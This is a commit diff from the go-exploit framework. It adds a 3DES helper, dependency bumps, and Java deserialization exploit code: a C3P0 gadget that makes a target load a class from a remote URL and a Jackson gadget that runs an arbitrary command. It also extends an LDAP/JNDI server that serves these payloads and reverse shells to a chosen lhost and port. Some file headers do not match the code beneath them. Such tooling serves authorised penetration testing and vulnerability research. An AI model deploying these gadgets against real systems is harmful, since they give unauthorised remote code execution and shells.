Merge branch 'main' of github.com:vulncheck-oss/go-exploit

Author: lobsterjerusalem

encryption/des.go

@@ -0,0 +1,33 @@
+package encryption
+
+import (
+	"bytes"
+	"crypto/cipher"
+	"crypto/des"
+
+	"github.com/vulncheck-oss/go-exploit/output"
+)
+
+func PKCS5Padding(src []byte, blockSize int) []byte {
+	padding := blockSize - len(src)%blockSize
+	padtext := bytes.Repeat([]byte{byte(padding)}, padding)
+
+	return append(src, padtext...)
+}
+
+func TripleDesEncryption(key, iv, plainText []byte) ([]byte, bool) {
+	block, err := des.NewTripleDESCipher(key)
+	if err != nil {
+		output.PrintFrameworkError(err.Error())
+
+		return nil, false
+	}
+
+	blockSize := block.BlockSize()
+	origData := PKCS5Padding(plainText, blockSize)
+	blockMode := cipher.NewCBCEncrypter(block, iv)
+	cryted := make([]byte, len(origData))
+	blockMode.CryptBlocks(cryted, origData)
+
+	return cryted, true
+}

go.mod

@@ -10,10 +10,10 @@ require (
 	github.com/icholy/digest v1.1.0
 	github.com/lor00x/goldap v0.0.0-20240304151906-8d785c64d1c8
 	github.com/vjeantet/ldapserver v1.0.2-0.20240305064909-a417792e2906
-	golang.org/x/crypto v0.40.0
-	golang.org/x/net v0.42.0
-	golang.org/x/text v0.27.0
-	modernc.org/sqlite v1.38.2
+	golang.org/x/crypto v0.43.0
+	golang.org/x/net v0.46.0
+	golang.org/x/text v0.30.0
+	modernc.org/sqlite v1.39.1
 )
 
 require (
@@ -27,8 +27,8 @@ require (
 	github.com/ncruces/go-strftime v0.1.9 // indirect
 	github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect
 	golang.org/x/exp v0.0.0-20250620022241-b7579e27df2b // indirect
-	golang.org/x/sys v0.34.0 // indirect
-	modernc.org/libc v1.66.3 // indirect
+	golang.org/x/sys v0.37.0 // indirect
+	modernc.org/libc v1.66.10 // indirect
 	modernc.org/mathutil v1.7.1 // indirect
 	modernc.org/memory v1.11.0 // indirect
 )

go.sum

@@ -48,17 +48,17 @@ golang.org/x/crypto v0.13.0/go.mod h1:y6Z2r+Rw4iayiXXAIxJIDAJ1zMW4yaTpebo8fPOliY
 golang.org/x/crypto v0.19.0/go.mod h1:Iy9bg/ha4yyC70EfRS8jz+B6ybOBKMaSxLj6P6oBDfU=
 golang.org/x/crypto v0.23.0/go.mod h1:CKFgDieR+mRhux2Lsu27y0fO304Db0wZe70UKqHu0v8=
 golang.org/x/crypto v0.31.0/go.mod h1:kDsLvtWBEx7MV9tJOj9bnXsPbxwJQ6csT/x4KIN4Ssk=
-golang.org/x/crypto v0.40.0 h1:r4x+VvoG5Fm+eJcxMaY8CQM7Lb0l1lsmjGBQ6s8BfKM=
-golang.org/x/crypto v0.40.0/go.mod h1:Qr1vMER5WyS2dfPHAlsOj01wgLbsyWtFn/aY+5+ZdxY=
+golang.org/x/crypto v0.43.0 h1:dduJYIi3A3KOfdGOHX8AVZ/jGiyPa3IbBozJ5kNuE04=
+golang.org/x/crypto v0.43.0/go.mod h1:BFbav4mRNlXJL4wNeejLpWxB7wMbc79PdRGhWKncxR0=
 golang.org/x/exp v0.0.0-20250620022241-b7579e27df2b h1:M2rDM6z3Fhozi9O7NWsxAkg/yqS/lQJ6PmkyIV3YP+o=
 golang.org/x/exp v0.0.0-20250620022241-b7579e27df2b/go.mod h1:3//PLf8L/X+8b4vuAfHzxeRUl04Adcb341+IGKfnqS8=
 golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=
 golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
 golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
 golang.org/x/mod v0.15.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c=
 golang.org/x/mod v0.17.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c=
-golang.org/x/mod v0.25.0 h1:n7a+ZbQKQA/Ysbyb0/6IbB1H/X41mKgbhfv7AfG/44w=
-golang.org/x/mod v0.25.0/go.mod h1:IXM97Txy2VM4PJ3gI61r1YEk/gAj6zAHN3AdZt6S9Ww=
+golang.org/x/mod v0.28.0 h1:gQBtGhjxykdjY9YhZpSlZIsbnaE2+PgjfLWUQTnoZ1U=
+golang.org/x/mod v0.28.0/go.mod h1:yfB/L0NOf/kmEbXjzCPOx1iK1fRutOydrCMsqRhEBxI=
 golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
 golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
 golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
@@ -68,17 +68,17 @@ golang.org/x/net v0.15.0/go.mod h1:idbUs1IY1+zTqbi8yxTbhexhEEk5ur9LInksu6HrEpk=
 golang.org/x/net v0.21.0/go.mod h1:bIjVDfnllIU7BJ2DNgfnXvpSvtn8VRwhlsaeUTyUS44=
 golang.org/x/net v0.25.0/go.mod h1:JkAGAh7GEvH74S6FOH42FLoXpXbE/aqXSrIQjXgsiwM=
 golang.org/x/net v0.33.0/go.mod h1:HXLR5J+9DxmrqMwG9qjGCxZ+zKXxBru04zlTvWlWuN4=
-golang.org/x/net v0.42.0 h1:jzkYrhi3YQWD6MLBJcsklgQsoAcw89EcZbJw8Z614hs=
-golang.org/x/net v0.42.0/go.mod h1:FF1RA5d3u7nAYA4z2TkclSCKh68eSXtiFwcWQpPXdt8=
+golang.org/x/net v0.46.0 h1:giFlY12I07fugqwPuWJi68oOnpfqFnJIJzaIIm2JVV4=
+golang.org/x/net v0.46.0/go.mod h1:Q9BGdFy1y4nkUwiLvT5qtyhAnEHgnQ/zd8PfU6nc210=
 golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.3.0/go.mod h1:FU7BRWz2tNW+3quACPkgCx/L+uEAv1htQ0V83Z9Rj+Y=
 golang.org/x/sync v0.6.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk=
 golang.org/x/sync v0.7.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk=
 golang.org/x/sync v0.10.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk=
-golang.org/x/sync v0.16.0 h1:ycBJEhp9p4vXvUZNszeOq0kGTPghopOL8q0fq3vstxw=
-golang.org/x/sync v0.16.0/go.mod h1:1dzgHSNfp02xaA81J2MS99Qcpr2w7fw1gpm99rleRqA=
+golang.org/x/sync v0.17.0 h1:l60nONMj9l5drqw6jlhIELNv9I0A4OFgRsG9k2oT9Ug=
+golang.org/x/sync v0.17.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
 golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
 golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
@@ -91,8 +91,8 @@ golang.org/x/sys v0.12.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/sys v0.17.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
 golang.org/x/sys v0.20.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
 golang.org/x/sys v0.28.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
-golang.org/x/sys v0.34.0 h1:H5Y5sJ2L2JRdyv7ROF1he/lPdvFsd0mJHFw2ThKHxLA=
-golang.org/x/sys v0.34.0/go.mod h1:BJP2sWEmIv4KK5OTEluFJCKSidICx8ciO85XgH3Ak8k=
+golang.org/x/sys v0.37.0 h1:fdNQudmxPjkdUTPnLn5mdQv7Zwvbvpaxqs831goi9kQ=
+golang.org/x/sys v0.37.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
 golang.org/x/telemetry v0.0.0-20240228155512-f48c80bd79b2/go.mod h1:TeRTkGYfJXctD9OcfyVLyj2J3IxLnKwHJR8f4D8a3YE=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
 golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
@@ -111,33 +111,33 @@ golang.org/x/text v0.13.0/go.mod h1:TvPlkZtksWOMsz7fbANvkp4WM8x/WCo/om8BMLbz+aE=
 golang.org/x/text v0.14.0/go.mod h1:18ZOQIKpY8NJVqYksKHtTdi31H5itFRjB5/qKTNYzSU=
 golang.org/x/text v0.15.0/go.mod h1:18ZOQIKpY8NJVqYksKHtTdi31H5itFRjB5/qKTNYzSU=
 golang.org/x/text v0.21.0/go.mod h1:4IBbMaMmOPCJ8SecivzSH54+73PCFmPWxNTLm+vZkEQ=
-golang.org/x/text v0.27.0 h1:4fGWRpyh641NLlecmyl4LOe6yDdfaYNrGb2zdfo4JV4=
-golang.org/x/text v0.27.0/go.mod h1:1D28KMCvyooCX9hBiosv5Tz/+YLxj0j7XhWjpSUF7CU=
+golang.org/x/text v0.30.0 h1:yznKA/E9zq54KzlzBEAWn1NXSQ8DIp/NYMy88xJjl4k=
+golang.org/x/text v0.30.0/go.mod h1:yDdHFIX9t+tORqspjENWgzaCVXgk0yYnYuSZ8UzzBVM=
 golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
 golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
 golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc=
 golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU=
 golang.org/x/tools v0.13.0/go.mod h1:HvlwmtVNQAhOuCjW7xxvovg8wbNq7LwfXh/k7wXUl58=
 golang.org/x/tools v0.21.1-0.20240508182429-e35e4ccd0d2d/go.mod h1:aiJjzUbINMkxbQROHiO6hDPo2LHcIPhhQsa9DLh0yGk=
-golang.org/x/tools v0.34.0 h1:qIpSLOxeCYGg9TrcJokLBG4KFA6d795g0xkBkiESGlo=
-golang.org/x/tools v0.34.0/go.mod h1:pAP9OwEaY1CAW3HOmg3hLZC5Z0CCmzjAF2UQMSqNARg=
+golang.org/x/tools v0.37.0 h1:DVSRzp7FwePZW356yEAChSdNcQo6Nsp+fex1SUW09lE=
+golang.org/x/tools v0.37.0/go.mod h1:MBN5QPQtLMHVdvsbtarmTNukZDdgwdwlO5qGacAzF0w=
 golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
 gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
 gotest.tools/v3 v3.5.1 h1:EENdUnS3pdur5nybKYIh2Vfgc8IUNBjxDPSjtiJcOzU=
 gotest.tools/v3 v3.5.1/go.mod h1:isy3WKz7GK6uNw/sbHzfKBLvlvXwUyV06n6brMxxopU=
-modernc.org/cc/v4 v4.26.2 h1:991HMkLjJzYBIfha6ECZdjrIYz2/1ayr+FL8GN+CNzM=
-modernc.org/cc/v4 v4.26.2/go.mod h1:uVtb5OGqUKpoLWhqwNQo/8LwvoiEBLvZXIQ/SmO6mL0=
-modernc.org/ccgo/v4 v4.28.0 h1:rjznn6WWehKq7dG4JtLRKxb52Ecv8OUGah8+Z/SfpNU=
-modernc.org/ccgo/v4 v4.28.0/go.mod h1:JygV3+9AV6SmPhDasu4JgquwU81XAKLd3OKTUDNOiKE=
-modernc.org/fileutil v1.3.8 h1:qtzNm7ED75pd1C7WgAGcK4edm4fvhtBsEiI/0NQ54YM=
-modernc.org/fileutil v1.3.8/go.mod h1:HxmghZSZVAz/LXcMNwZPA/DRrQZEVP9VX0V4LQGQFOc=
+modernc.org/cc/v4 v4.26.5 h1:xM3bX7Mve6G8K8b+T11ReenJOT+BmVqQj0FY5T4+5Y4=
+modernc.org/cc/v4 v4.26.5/go.mod h1:uVtb5OGqUKpoLWhqwNQo/8LwvoiEBLvZXIQ/SmO6mL0=
+modernc.org/ccgo/v4 v4.28.1 h1:wPKYn5EC/mYTqBO373jKjvX2n+3+aK7+sICCv4Fjy1A=
+modernc.org/ccgo/v4 v4.28.1/go.mod h1:uD+4RnfrVgE6ec9NGguUNdhqzNIeeomeXf6CL0GTE5Q=
+modernc.org/fileutil v1.3.40 h1:ZGMswMNc9JOCrcrakF1HrvmergNLAmxOPjizirpfqBA=
+modernc.org/fileutil v1.3.40/go.mod h1:HxmghZSZVAz/LXcMNwZPA/DRrQZEVP9VX0V4LQGQFOc=
 modernc.org/gc/v2 v2.6.5 h1:nyqdV8q46KvTpZlsw66kWqwXRHdjIlJOhG6kxiV/9xI=
 modernc.org/gc/v2 v2.6.5/go.mod h1:YgIahr1ypgfe7chRuJi2gD7DBQiKSLMPgBQe9oIiito=
 modernc.org/goabi0 v0.2.0 h1:HvEowk7LxcPd0eq6mVOAEMai46V+i7Jrj13t4AzuNks=
 modernc.org/goabi0 v0.2.0/go.mod h1:CEFRnnJhKvWT1c1JTI3Avm+tgOWbkOu5oPA8eH8LnMI=
-modernc.org/libc v1.66.3 h1:cfCbjTUcdsKyyZZfEUKfoHcP3S0Wkvz3jgSzByEWVCQ=
-modernc.org/libc v1.66.3/go.mod h1:XD9zO8kt59cANKvHPXpx7yS2ELPheAey0vjIuZOhOU8=
+modernc.org/libc v1.66.10 h1:yZkb3YeLx4oynyR+iUsXsybsX4Ubx7MQlSYEw4yj59A=
+modernc.org/libc v1.66.10/go.mod h1:8vGSEwvoUoltr4dlywvHqjtAqHBaw0j1jI7iFBTAr2I=
 modernc.org/mathutil v1.7.1 h1:GCZVGXdaN8gTqB1Mf/usp1Y/hSqgI2vAGGP4jZMCxOU=
 modernc.org/mathutil v1.7.1/go.mod h1:4p5IwJITfppl0G4sUEDtCr4DthTaT47/N3aT6MhfgJg=
 modernc.org/memory v1.11.0 h1:o4QC8aMQzmcwCK3t3Ux/ZHmwFPzE6hf2Y5LbkRs+hbI=
@@ -146,8 +146,8 @@ modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8=
 modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns=
 modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w=
 modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE=
-modernc.org/sqlite v1.38.2 h1:Aclu7+tgjgcQVShZqim41Bbw9Cho0y/7WzYptXqkEek=
-modernc.org/sqlite v1.38.2/go.mod h1:cPTJYSlgg3Sfg046yBShXENNtPrWrDX8bsbAQBzgQ5E=
+modernc.org/sqlite v1.39.1 h1:H+/wGFzuSCIEVCvXYVHX5RQglwhMOvtHSv+VtidL2r4=
+modernc.org/sqlite v1.39.1/go.mod h1:9fjQZ0mB1LLP0GYrp39oOJXx/I2sxEnZtzCmEQIKvGE=
 modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0=
 modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A=
 modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=

java/gadgets/C3P0.bin

@@ -1,20 +1,32 @@
 package java
 
 import (
+	"embed"
 	"errors"
 	"fmt"
+	"path/filepath"
 	"strconv"
 	"strings"
 
 	"github.com/vulncheck-oss/go-exploit/transform"
 )
 
-var errInvalidCommandLength = errors.New("invalid command length")
+//go:embed gadgets
+var gadgets embed.FS
+
+var (
+	errInvalidCommandLength = errors.New("invalid command length")
+	errInvalidCallbackArg   = errors.New("invalid callback arg")
+)
 
 func ErrorInvalidCommandLength(msg string) error {
 	return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
 }
 
+func ErrorInvalidCallbackArg(msg string) error {
+	return fmt.Errorf("%w: %s", errInvalidCallbackArg, msg)
+}
+
 // This payload was generated using ysoserial-modified with the CommonsCollections6 gadget and the bash shell arg
 // The benefit of this payload over one generated from the unmodified ysoserial is the you do not need to
 // prepend it with a bash -c, and the spaces do not need to be replaced with $IFS.
@@ -415,6 +427,54 @@ func Commons10CommandBytecode(commandStr string) (string, error) {
 	return payloadBytes, nil
 }
 
+// Load `className` from `baseURL` using `URLClassLoader`.
+//
+// Generated by ysoserial using the "C3P0" gadget chain with placeholder arguments "<base_url>" and "<classname>".
+func C3P0ClassCallbackBytecode(baseURL, className string) (string, error) {
+	// 16-bit (short) unsigned integer (big-endian)
+	if len(baseURL) < 1 || len(baseURL) > 65535 {
+		return "", ErrorInvalidCallbackArg("baseURL must be between 1 and 65535 characters")
+	} else if len(className) < 1 || len(className) > 65535 {
+		return "", ErrorInvalidCallbackArg("className must be between 1 and 65535 characters")
+	}
+
+	// $ java -jar ysoserial.jar C3P0 "<base_url>:<classname>"
+	gadgetBytes, err := gadgets.ReadFile(filepath.Join("gadgets", "C3P0.bin"))
+	if err != nil {
+		return "", fmt.Errorf("failed to read gadget: %w", err)
+	}
+
+	gadget := string(gadgetBytes)
+	gadget = strings.ReplaceAll(gadget, "\x00\x0a<base_url>", transform.PackBigInt16(len(baseURL))+baseURL)
+	gadget = strings.ReplaceAll(gadget, "\x00\x0b<classname>", transform.PackBigInt16(len(className))+className)
+
+	return gadget, nil
+}
+
+// https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/blob/f9e097041b08d48289c3dae004996caa28718184/src/main/java/payloads/Jackson.java
+func JacksonGenericCommand(cmd string) (string, error) {
+	// 16-bit (short) unsigned integer (big-endian)
+	if len(cmd) < 1 || len(cmd) > 65535 {
+		return "", ErrorInvalidCommandLength("cmd must be between 1 and 65535 characters")
+	}
+
+	// $ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -D Jackson -C "touch /tmp/vulnerable"
+	gadgetBytes, err := gadgets.ReadFile(filepath.Join("gadgets", "Jackson.bin"))
+	if err != nil {
+		return "", fmt.Errorf("failed to read gadget: %w", err)
+	}
+
+	gadget := string(gadgetBytes)
+	gadget = strings.ReplaceAll(gadget, "\x00\x15touch /tmp/vulnerable", transform.PackBigInt16(len(cmd))+cmd)
+	const (
+		arraySizeWithCommand    = "\x00\x00\x06\x54" // 1620
+		arraySizeWithoutCommand = 1599
+	)
+	gadget = strings.ReplaceAll(gadget, arraySizeWithCommand, transform.PackBigInt32(arraySizeWithoutCommand+len(cmd)))
+
+	return gadget, nil
+}
+
 // This is a serialized java reverse shell. The gadget was generated by ysoserial
 // but using the code in this pull https://github.com/frohoff/ysoserial/pull/96
 // and updated to make it easy to swap in the desired lhost+lport of our choosing

java/gadgets/Jackson.bin

@@ -22,6 +22,7 @@ import (
 
 	message "github.com/lor00x/goldap/message"
 	ldap "github.com/vjeantet/ldapserver"
+	"github.com/vulncheck-oss/go-exploit/java"
 	"github.com/vulncheck-oss/go-exploit/output"
 )
 
@@ -38,16 +39,18 @@ const (
 	BeanUtils194GenericBash GadgetName = 3
 	// load class via an HTTP server.
 	HTTPReverseShell GadgetName = 4
+	// See implementation in java.JacksonGenericCommand.
+	JacksonGenericCommand GadgetName = 5
 )
 
 // a dirty way to pass the user's desired gadget to `handleBind`.
-var globalSerializedPayload string
+var GlobalSerializedPayload string
 
 // a dirty way to pass the user's desired name to `handleBind`.
-var globalName string
+var GlobalName string
 
 // if the class is loaded from a secondary http server, this will be set.
-var globalHTTPServer string
+var GlobalHTTPServer string
 
 // automatically accept.
 func handleBind(w ldap.ResponseWriter, _ *ldap.Message) {
@@ -59,29 +62,29 @@ func handleBind(w ldap.ResponseWriter, _ *ldap.Message) {
 // Accept the incoming request. Verify it is asking for the correct endpoint
 // and then send the user's requested gadget'.
 func handleSearch(writer ldap.ResponseWriter, msg *ldap.Message) {
-	if len(globalSerializedPayload) == 0 {
+	if len(GlobalSerializedPayload) == 0 {
 		output.PrintFrameworkError("A serialized payload was never configured!")
 	}
 
 	req := msg.GetSearchRequest()
 	dname := string(req.BaseObject())
 
-	if dname != globalName {
-		output.PrintfFrameworkError("Received an unexpected request: %s != %s\n", dname, globalName)
+	if dname != GlobalName {
+		output.PrintfFrameworkError("Received an unexpected request: %s != %s\n", dname, GlobalName)
 
 		return
 	}
 
 	// send search result
 	res := ldap.NewSearchResultEntry(dname)
-	if strings.HasPrefix(globalSerializedPayload, "\xca\xfe\xba\xbe") {
+	if strings.HasPrefix(GlobalSerializedPayload, "\xca\xfe\xba\xbe") {
 		res.AddAttribute("javaClassName", "foo")
-		res.AddAttribute("javaCodeBase", message.AttributeValue(globalHTTPServer))
+		res.AddAttribute("javaCodeBase", message.AttributeValue(GlobalHTTPServer))
 		res.AddAttribute("objectClass", "javaNamingReference")
-		res.AddAttribute("javaFactory", message.AttributeValue(globalName))
+		res.AddAttribute("javaFactory", message.AttributeValue(GlobalName))
 	} else {
 		res.AddAttribute("javaClassName", "java.lang.String")
-		res.AddAttribute("javaSerializedData", message.AttributeValue(globalSerializedPayload))
+		res.AddAttribute("javaSerializedData", message.AttributeValue(GlobalSerializedPayload))
 	}
 	writer.Write(res)
 
@@ -106,21 +109,26 @@ func CreateLDAPServer(name string) *ldap.Server {
 	server.Handle(routes)
 
 	// set a name so that we aren't tossing exploits at just anyone
-	globalName = name
+	GlobalName = name
 
 	return server
 }
 
-func SetLDAPGadget(gadget GadgetName, binary string, lhost string, lport int, command string) {
+func SetLDAPGadget(gadget GadgetName, binary, lhost string, lport int, command string) {
 	switch gadget {
 	case TomcatNashornReverseShell:
-		globalSerializedPayload = createTomcatNashornReverseShell(binary, lhost, lport)
+		GlobalSerializedPayload = createTomcatNashornReverseShell(binary, lhost, lport)
 	case TomcatGenericBash:
-		globalSerializedPayload = createTomcatGenericGadget(command)
+		GlobalSerializedPayload = createTomcatGenericGadget(command)
 	case GroovyGenericBash:
-		globalSerializedPayload = createGroovyGenericBash(command)
+		GlobalSerializedPayload = createGroovyGenericBash(command)
 	case BeanUtils194GenericBash:
-		globalSerializedPayload = createBeanUtils194GenericBash(command)
+		GlobalSerializedPayload = createBeanUtils194GenericBash(command)
+	case JacksonGenericCommand:
+		var err error
+		if GlobalSerializedPayload, err = java.JacksonGenericCommand(command); err != nil {
+			output.PrintFrameworkError(err.Error())
+		}
 	case HTTPReverseShell:
 		fallthrough
 	default:
@@ -131,7 +139,7 @@ func SetLDAPGadget(gadget GadgetName, binary string, lhost string, lport int, co
 func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost string, httpPort int) {
 	switch gadget {
 	case HTTPReverseShell:
-		globalSerializedPayload = createHTTPReverseShell(lhost, lport, globalName)
+		GlobalSerializedPayload = createHTTPReverseShell(lhost, lport, GlobalName)
 	case TomcatNashornReverseShell:
 		fallthrough
 	case TomcatGenericBash:
@@ -140,15 +148,17 @@ func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost strin
 		fallthrough
 	case BeanUtils194GenericBash:
 		fallthrough
+	case JacksonGenericCommand:
+		fallthrough
 	default:
 		output.PrintFrameworkError("Invalid payload")
 
 		return
 	}
 
-	globalHTTPServer = "http://" + httpHost + ":" + strconv.Itoa(httpPort) + "/"
-	http.HandleFunc("/"+globalName+".class", func(w http.ResponseWriter, _ *http.Request) {
-		fmt.Fprint(w, globalSerializedPayload)
+	GlobalHTTPServer = "http://" + httpHost + ":" + strconv.Itoa(httpPort) + "/"
+	http.HandleFunc("/"+GlobalName+".class", func(w http.ResponseWriter, _ *http.Request) {
+		fmt.Fprint(w, GlobalSerializedPayload)
 	})
 
 	output.PrintfFrameworkStatus("Starting HTTP Server on %s:%d", httpHost, httpPort)
@@ -166,7 +176,7 @@ func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost strin
 // "10.9.49.242" -> lhost
 // 1270 -> lport
 // The change in size will then be accounted for in the padding variable.
-func createTomcatNashornReverseShell(binary string, lhost string, lport int) string {
+func createTomcatNashornReverseShell(binary, lhost string, lport int) string {
 	shellPayload := "\xac\xed" +
 		"\x00\x05\x73\x72\x00\x1d\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65" +
 		"\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x52\x65\x73\x6f\x75\x72\x63\x65" +